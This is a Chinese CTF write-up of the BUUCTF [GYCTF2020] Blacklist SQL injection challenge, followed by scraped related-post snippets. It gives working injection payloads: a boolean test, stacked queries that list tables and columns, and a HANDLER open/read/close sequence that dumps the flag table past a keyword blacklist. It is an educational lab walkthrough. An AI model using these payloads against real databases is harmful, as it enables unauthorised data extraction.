BUUCTF[GYCTF2020]Blacklist
sql注入题型,测试发现黑名单如下:
大小写,双写,编码均不可绕过。
可用的还有,or and union show
输入:1 or 1=1 无反应
输入:1' or '1' ='1 如下:
字符型注入,由于show可用,所以我们想到堆叠注入:
1';show tables;
查看字段名,
1';show columns from FlagHere;
过滤机制过于强大,所以我们使用handler,
HANDLER...OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭。
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
打开FlagHere表,读取第一个,然后关闭会话。
思路:黑名单过滤,show可用,想到使用堆叠注入,知道flag在FlagHere表中之后,使用 handler 读取flag。
BUUCTF[GYCTF2020]Blacklist相关推荐
- BUUCTF [GYCTF2020] Blacklist
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容: 输入2/2判断注入类型: 回显为2,可以判断出为字符型注入 输入select,查看是否存在回显: re ...
- [GYCTF2020]Blacklist 使用handler函数进行sql堆注入
[GYCTF2020]Blacklist 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参 ...
- [GYCTF2020]Blacklist 1
[GYCTF2020]Blacklist 1 在做本题的时候,我们发现过滤掉了很多的关键字 很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入) 并且发现本关的注入方法为 ...
- [BUUCTF][GYCTF2020]Ezsqli
[GYCTF2020]Ezsqli 布尔盲注 无列名盲注 抓包,存在post的id参数. 进行测试 id=1时, :Nu1L id=0时, :Error Occured When Fetch Resu ...
- [GYCTF2020]Blacklist
输入1或者2会返回一个数组 随后输入1' union select 1,database()–+返回了过滤掉的语句 return preg_match("/set|prepare|alter ...
- supersqli 攻防世界
文章目录 一.supersqli 1.查找注入点 2.查看数据库.数据表 3.查看表的内容 二.知识拓展 1.我在mi数据库中创建了一个数据表 2.使用handler读取数据 一.supersqli ...
- BUUCTF持续更新中
目录 [HCTF 2018]WarmUp [强网杯 2019]随便注 [SUCTF 2019]EasySQL [GYCTF2020]Blacklist [GKCTF2020]cve版签到 GXYCTF ...
- Web渗透 不断更新
Web渗透 SQL注入 一般注入步骤 堆叠注入 堆叠注入原理 堆叠注入条件 堆叠注入实例 handler 盲注 GET&POST 检测绕过 变量替换.变换绕过 报错注入 SSTI模板注入 文件 ...
- BUU WEB刷题记录1(持续更新)
[MRCTF2020]你传你马呢 打开得到一张晦气的图片和文件上传点 尝试直接上传PHP文件失败(意料之中),随便上传了一张png图片,发现可以,将png文件内容改写成一句话木马<?php @e ...
最新文章
- 远控软件VNC***案例研究
- Hello World on Impala
- hdu1285 拓扑排序(裸)
- 【ArcGIS风暴】ArcGIS点云抽稀(稀疏化LAS点)详解案例教程
- P4288 [SHOI2014]信号增幅仪 最小圆覆盖
- Java IdentityHashMap values()方法与示例
- h5 表单居中_3分钟学会易企秀H5操作(基础篇)
- 推荐一款接口文档在线管理系统-MinDoc
- php日志缓存,php – Symfony和Docker – 缓存和日志目录权...
- [转载] Python str方法
- JDBC08时间处理
- 中国模式识别与计算机视觉会议,第二届中国模式识别与计算机视觉大会(PRCV2019)征稿...
- 你了解PowerBI中的去年同期吗
- 使用面向对象方法实现猜拳游戏(Java)
- Excel学习日记:L33-二八法则的神奇图表-柏拉图(帕累托图)
- HTTPS(对称加密+非对称加密+证书)
- 高性能MySQL(一) 如何做到高扩展性
- 帝国cms模板如何开启支持php,帝国cms模板使用说明与技巧
- “希希敬敬对”团队作业-敏捷冲刺-3
- B站左程云算法视频笔记(01
热门文章
- PTA---换硬币 (20 分)
- 22.Odoo产品分析 (三) – 人力资源板块(3) – 休假管理(1)
- 中级经济师人力资源专业
- Linux设备驱动-platform虚拟总线dya02
- 人工智能——搜索策论2
- html设置手机为数字,用数字4636设置手机网络类型的方法步骤
- R语言中的异常处理和eval函数
- C语言贪心算法书包问题,贪心算法背包有关问题(帮忙看看看)
- Android反向进度条(ProgressBar)的实现——从右到左的进度条
- 【人脸识别】face_recognition 库的使用